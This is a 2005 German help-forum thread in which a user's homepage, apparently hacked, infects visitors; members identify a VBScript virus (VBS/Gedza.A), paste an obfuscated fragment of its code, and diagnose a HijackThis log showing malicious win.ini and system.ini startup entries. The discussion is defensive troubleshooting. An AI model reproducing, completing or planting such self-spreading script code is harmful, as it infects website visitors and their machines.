Warum kostenlos registrieren?

Nur als registriertes Mitglied hast Du vollen Zugriff auf alle Funktionen unserer Website. So kannst Du eigene Fragen stellen und hast die volle Übersicht über neue interessante Themen im Forum.
Jetzt kostenlos registrieren.

Login


error 2011

Alles über Betriebssysteme, Anwenderprogramme und andere Software-Probleme.

error 2011

Beitragvon basti621 am 03.12.2005, 19:04

wenn ich meine homepage öffne... (www.bmx-glindow.de.vu) dann kommt diese fehlermeldung:
error 2011
this paginates it requires controls activex to be shown in their entirety press to accept

wenn ich dann auf ok klicke kommt diese immer wieder :roll: :(
hat jemand ne ahnung? :roll:
basti621
 
Beiträge: 4
Registriert: 03.12.2005, 19:00


Beitragvon A aus B am 04.12.2005, 00:01

Also. Wenn ich auf die Seite gehe meldet sich mein Antivir!!!!

Soll das witzig sein?
Ich kann jedenfalls nicht drüber lachen.
A aus B
 
Beiträge: 245
Registriert: 18.09.2005, 16:06

Beitragvon blod am 04.12.2005, 00:20

Schaut irgendwie so aus als ob deine Seite gecrackt wurde, ich würde sie vom Netz nehmen, falls meine Vermutung stimmt.

<Script Language='VBScript'>
'<*****************************GEDZAC LABS 2004****************************>
Rem VBS/Israfel.a un producto de <GEDZAC LABS>
Rem USA aqui tienes un enemigo más, un grano de arena más en el desierto
Rem Fk`ri'cnf'bbrr'wf`fuf'whu'vrbubu'cbdnukb'fk'jrich'dhjh'snbib'vrb'qnqnu+'~'btwbuh'btsfu'fvrn'wfuf'qbukh
Rem Bk'tfrdb'tb'qf'tbdfich+'wbuh'kf'tbjnkkf'wbutntsb+'drfich'kf'snbuuf'tbf'kf'ncôibf'wfuf'wkfisfukf+'bk'tfrdb'`bujnifuæ'~'ofeuæ'hsuf'hwhusrincfc
Rem Dhjh'cndb'erto='vrb'Cnht'ebicn`f'f'bbrr+'kh'qfi'f'ibdbtnsfu
'<*************************************************************************>
'<Nud)Ntufabk)f'99'@BC]FD'KFET'99'Cbcndfch'f'Fqunk'Kfqn`ib'=.
'dsdw'6=(-=-=|')dsdwubwk~'#indl'('Udne6c7'{'na'/"f)hi':'#surb.'|'qfu'"f':'#ubjhqb/#6*+(.'{'"f'{'(dkbfu'{'ofks'z'z
'Hi'6=SB_S=k`i-=-=|'qfu'"k`':'#ubjhqb/#6+k`i.
'''na'/"k`'::'#dou/674.'#,'#dou/676.'#,'#dou/677.'#,'#dou/67>.'#,'#dou/672..'|
'''''na'/#5'::'Hi.'|')tbs'"f
blod
 
Beiträge: 203
Registriert: 10.09.2005, 00:47

hi

Beitragvon miramar am 04.12.2005, 00:24

vieleicht eine fehlerhafte dadei von einem bild das heist enlich
Zuletzt geändert von miramar am 04.12.2005, 00:32, insgesamt 1-mal geändert.
miramar
 
Beiträge: 12
Registriert: 17.11.2005, 18:22

Beitragvon blod am 04.12.2005, 00:25

Das ist keine Datei, das ist ein Scriptkiddie-Script, und kein anständiger Mensch, schreibt sowas. Wenn du sowas auf einer Seite von mir findest, erschiess mich bitte.
blod
 
Beiträge: 203
Registriert: 10.09.2005, 00:47

Beitragvon BlueScreen-Bertrand am 04.12.2005, 01:52

Die Meldung in dem schlechten Englisch bedeutet wohl, dass die Active-X-Steuerelemente deaktiviert sind. Falls du den MS-Internetexplorer verwendest, kannst du dies unter "Extras" und "Internetoptionen" einstellen; andernfalls verlangen irgendwelche Elemente auf der Homepage Active-X, vielleicht fällt dir dafür eine andere Lösung ein.
Antivir und meine Firewall hatten sich bei mir übrigens nicht gemeldet...
aber du solltest deiner Site mal einen anderen Name als "Unbenanntes Dokument" geben.
BlueScreen-Bertrand
Moderator
 
Beiträge: 11253
Registriert: 28.11.2005, 19:01
Wohnort: Waldshut-Tiengen

Beitragvon BlueScreen-Bertrand am 04.12.2005, 01:56

OK, jetzt hat sich die Firewall gemeldet:
Das Virus VBS/Gedza.A ist auf der Site "http://www.bmx-glindow.de.vu"enthalten und befindet sich während der Sitzung in den temporären Internet-Dateien.
Mal schauen, ob sich dein Provider zu gewissen Aktionen bewegen lässt...
BlueScreen-Bertrand
Moderator
 
Beiträge: 11253
Registriert: 28.11.2005, 19:01
Wohnort: Waldshut-Tiengen

Beitragvon basti621 am 04.12.2005, 02:43

also von viren weiss ick nix aber das activex is aktiv aber wenn ich mit firefox auf die page gehe kommt die activex-meldung nicht und bei avant kommt sie dennoch :roll:
basti621
 
Beiträge: 4
Registriert: 03.12.2005, 19:00

Beitragvon Holy Marcell am 04.12.2005, 11:11

Basti:

Du hast das problem nicht erkannt oder?

Deine Homepage wurde gehackt und man hat einen Virus drauf eingepflanzt. Du nimmst diese Seite jetzt sofort vom Netz und änderst ALLE deine passwörter für Ebay, deinen FTP-server, icq einfach alles!

=====

Dann machst du das hier:

Hijackthis:
http://computercops.biz/zx/Merijn/hijackthis.zip
Lade/entpacke HijackThis in einem Ordner
--> None of the above just start the program --> Save--> Savelog -->es öffnet sich der Editor
nun das KOMPLETTE Log mit rechtem Mausklick abkopieren und ins Forum mit rechtem Mausklick "einfügen"
Bebilderte Kurzanleitung
Holy Marcell
 

Beitragvon basti621 am 04.12.2005, 17:25

Logfile of HijackThis v1.99.1
Scan saved at 16:24:35, on 04.12.2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Mixer.exe
C:\Programme\MessengerPlus! 3\MsgPlus.exe
C:\Programme\Java\jre1.5.0_05\bin\jusched.exe
C:\Programme\SlySoft\CloneCD\CloneCDTray.exe
C:\Programme\Winamp\winampa.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\Rainlendar\Rainlendar.exe
C:\Programme\Messenger\msmsgs.exe
C:\Programme\MSN Messenger\msnmsgr.exe
C:\Programme\Steam\Steam.exe
C:\Program Files\mIRC\mirc.exe
C:\Programme\Winamp\Winamp.exe
C:\Programme\Avant Browser\avant.exe
C:\WINDOWS\system32\rundll32.exe
C:\Dokumente und Einstellungen\Basti\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://runonce.msn.com/?v=msgrv75
F0 - system.ini: Shell=Explorer.exe C:\WINDOWS\system32\winmgd.win
F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Programme\MessengerPlus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programme\Java\jre1.5.0_05\bin\jusched.exe
O4 - HKLM\..\Run: [CloneCDTray] "C:\Programme\SlySoft\CloneCD\CloneCDTray.exe" /s
O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Steam] "c:\programme\steam\steam.exe" -silent
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Programme\MessengerPlus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [msnmsgr] "C:\Programme\MSN Messenger\msnmsgr.exe" /background
O4 - Startup: Rainlendar.lnk = C:\Programme\Rainlendar\Rainlendar.exe
O8 - Extra context menu item: Add selected links to Link Container - C:\PROGRA~1\ANTIVI~1\WEBFIL~1\System\Scripts\off_collector_sel.htm
O8 - Extra context menu item: Alle Bilder von gleichem Server filtern - C:\Programme\Avant Browser\AddAllToADBlackList.htm
O8 - Extra context menu item: Hervorheben - C:\Programme\Avant Browser\Highlight.htm
O8 - Extra context menu item: In neuem Avant Browser öffnen - C:\Programme\Avant Browser\OpenInNewBrowser.htm
O8 - Extra context menu item: Show domain links - C:\PROGRA~1\ANTIVI~1\WEBFIL~1\System\Scripts\off_domain_links.htm
O8 - Extra context menu item: Suchen - C:\Programme\Avant Browser\Search.htm
O8 - Extra context menu item: Zur Werbebanner-Filterliste hinzufügen - C:\Programme\Avant Browser\AddToADBlackList.htm
O8 - Extra context menu item: Öffne alle Links auf dieser Seite... - C:\Programme\Avant Browser\OpenAllLinks.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_05\bin\npjpi150_05.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_05\bin\npjpi150_05.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O23 - Service: MSSQL$SONY_MEDIAMGR - Unknown owner - C:\Programme\Sony\Shared Plug-Ins\Media Manager\MSSQL$SONY_MEDIAMGR\Binn\sqlservr.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SQLAgent$SONY_MEDIAMGR - Unknown owner - C:\Programme\Sony\Shared Plug-Ins\Media Manager\MSSQL$SONY_MEDIAMGR\Binn\sqlagent.EXE (file missing)

Also... Ich habe jetz die Quelltexte geändert da stand so viel K*cke drin.... Und wenn ich die Seite jetzt öffne kommt keine medlung mehr, aber die HTML-Dateien auf meinem Rechner kriegen von alleine den Quelltext der sich dort eingefressen hatte :roll:
basti621
 
Beiträge: 4
Registriert: 03.12.2005, 19:00

Beitragvon Holy Marcell am 04.12.2005, 18:41

Ok, jetz wissen wir auch, wie der Code auf deine Seite gekommen ist:

F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win

=======

Formatiere deinen Rechner:

http://www.informationsarchiv.net/foren ... 43645.html
Holy Marcell
 

Beitragvon basti621 am 04.12.2005, 18:55

Kannste mir dis bissl genauer erklären woran es liegt? Wäre echt nett!
Formatiern kann ich ja :wink:
basti621
 
Beiträge: 4
Registriert: 03.12.2005, 19:00



Ähnliche Themen


Zurück zu Software-Hilfe

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 0 Gäste